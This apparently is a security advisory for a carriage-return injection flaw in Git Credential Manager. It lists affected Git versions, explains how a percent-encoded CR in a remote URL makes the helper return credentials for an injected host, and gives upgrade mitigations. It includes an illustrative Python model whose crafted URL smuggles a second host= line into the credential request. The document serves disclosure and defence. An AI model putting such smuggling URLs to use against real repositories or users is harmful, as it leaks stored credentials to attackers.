Git
cpe:2.3:a:git:git:*:*:*:*:*:*:*
- <= 2.48.0
- <= 2.47.1
- <= 2.46.2
- <= 2.45.2
- <= 2.44.2
- <= 2.43.5
- <= 2.42.3
- <= 2.41.2
- <= 2.40.3
Git Credential Manager (GCM) mishandles carriage return characters in remote URLs. Git's credential protocol is line-based and Git ends each line only with a line feed, but GCM also treats a bare carriage return as a line terminator. A remote URL that smuggles a percent-encoded carriage return into the credential request can therefore make GCM read an attacker-chosen protocol line, so that credentials stored for one server are returned and sent to another. GCM versions through 2.6.0 are affected; the issue is fixed in 2.6.1. Users who cannot upgrade should avoid cloning from untrusted URLs, particularly with the recursive option, since submodule URLs are chosen by the repository author.
Successful exploitation causes credentials held for one host to be presented to a different host of the attacker's choosing, handing the attacker those credentials and the access they grant.
The issue can be reproduced with a remote URL that carries a percent-encoded carriage return. Git rejects line feeds in credential values but, in the affected versions listed above, does not reject carriage returns, so the value is passed to the helper unchanged. GCM then treats the carriage return as a line break and parses the text after it as a further protocol line, such as a second host= entry, and returns the credentials stored for that injected host; Git sends them to the server the URL actually connects to. No interaction beyond running the Git command is required, so anything that clones or fetches from attacker-controlled URLs on the user's behalf, such as a package manager or a recursive submodule update, can trigger it.
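The following Python model makes the mechanism concrete. It is an added illustration, not code from Git or from Git Credential Manager: it simplifies Git's URL-to-credential parsing to the part that matters here, models a CR-lenient helper and a hardened one, and shows Git's own check both before and after it rejects carriage returns. The host names, the stored token and the URL are constructed for the example.

```python
from urllib.parse import unquote

# Constructed helper store (host -> credential). Not a real secret.
STORE = {"two.example.com": "user:constructed-token-for-two"}


def credential_from_url(url: str) -> dict:
    """Simplified model of how Git derives credential attributes from a URL:
    the protocol is everything before '://', the host everything up to the
    next '/', and both are percent-decoded. Because '?' does not end the
    host here, a '%0D' placed after it survives into the host value."""
    proto, sep, rest = url.partition("://")
    if not sep:
        raise ValueError("URL has no scheme")
    host, _, path = rest.partition("/")
    return {"protocol": unquote(proto), "host": unquote(host), "path": unquote(path)}


def connect_host(url: str) -> str:
    """The host an HTTP client actually connects to: the authority ends at
    the first '/', '?' or '#'."""
    rest = url.partition("://")[2]
    for stop in "/?#":
        rest = rest.split(stop, 1)[0]
    return rest


def write_protocol(attrs: dict, git_rejects_cr: bool) -> str:
    """Serialise attributes the way Git writes them to a helper's stdin:
    key=value lines, LF-terminated, ended by a blank line. Git has rejected
    '\\n' in values since 2020; the hardened behaviour (git_rejects_cr=True)
    rejects a bare '\\r' as well."""
    forbidden = "\r\n" if git_rejects_cr else "\n"
    lines = []
    for key in ("protocol", "host"):
        value = attrs[key]
        if any(ch in value for ch in forbidden):
            raise ValueError(f"credential value for {key} contains newline")
        lines.append(f"{key}={value}")
    return "\n".join(lines) + "\n\n"


def _parse(lines) -> dict:
    """Collect key=value pairs up to the blank line that ends a request.
    A repeated key overwrites the earlier value in this model."""
    attrs = {}
    for line in lines:
        if line == "":
            break
        key, sep, value = line.partition("=")
        if sep:
            attrs[key] = value
    return attrs


def helper_lenient(stdin: str) -> dict:
    """A helper whose line reader treats '\\r', '\\n' and '\\r\\n' all as
    line terminators (what .NET's TextReader.ReadLine does; Python's
    str.splitlines() reproduces that closely enough for this model)."""
    return _parse(stdin.splitlines())


def helper_strict(stdin: str) -> dict:
    """A hardened helper: splits on LF only and refuses any bare CR."""
    if "\r" in stdin:
        raise ValueError("carriage return in credential request")
    return _parse(stdin.split("\n"))


def run_scenario(url: str, git_rejects_cr: bool, helper) -> str:
    """Run one credential fill end to end and report where the returned
    credential would be sent, or why the request was refused."""
    try:
        payload = write_protocol(credential_from_url(url), git_rejects_cr)
        request = helper(payload)
    except ValueError as err:
        return f"blocked: {err}"
    cred = STORE.get(request.get("host"))
    target = connect_host(url)
    if cred is None:
        return f"no stored credential for request to {target}"
    return f"sent {cred!r} to {target}"


# Constructed URL: the '%0D' sits after '?', so the HTTP client still talks
# to one.example.com while the decoded credential host carries a bare CR
# followed by an attacker-chosen second host= line.
MALICIOUS = "https://one.example.com?%0dhost=two.example.com/repo.git"

if __name__ == "__main__":
    print(run_scenario(MALICIOUS, False, helper_lenient))  # two's token leaks to one.example.com
    print(run_scenario(MALICIOUS, False, helper_strict))   # refused by the hardened helper
    print(run_scenario(MALICIOUS, True, helper_lenient))   # refused by hardened Git
    print(run_scenario("https://two.example.com/repo.git", True, helper_strict))  # normal fill still works
```

The two hardening points are independent: the helper should never split on a bare CR, and Git should never pass a value containing one. Either alone stops this URL; shipping both means a single lenient component on either side no longer decides the outcome.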
Upgrade Git Credential Manager to version 2.6.1 or later; upgrade instructions are in the Git Credential Manager repository on GitHub. Upgrading Git beyond the affected versions listed above also helps, because newer Git releases refuse to pass credential values containing a carriage return to any helper.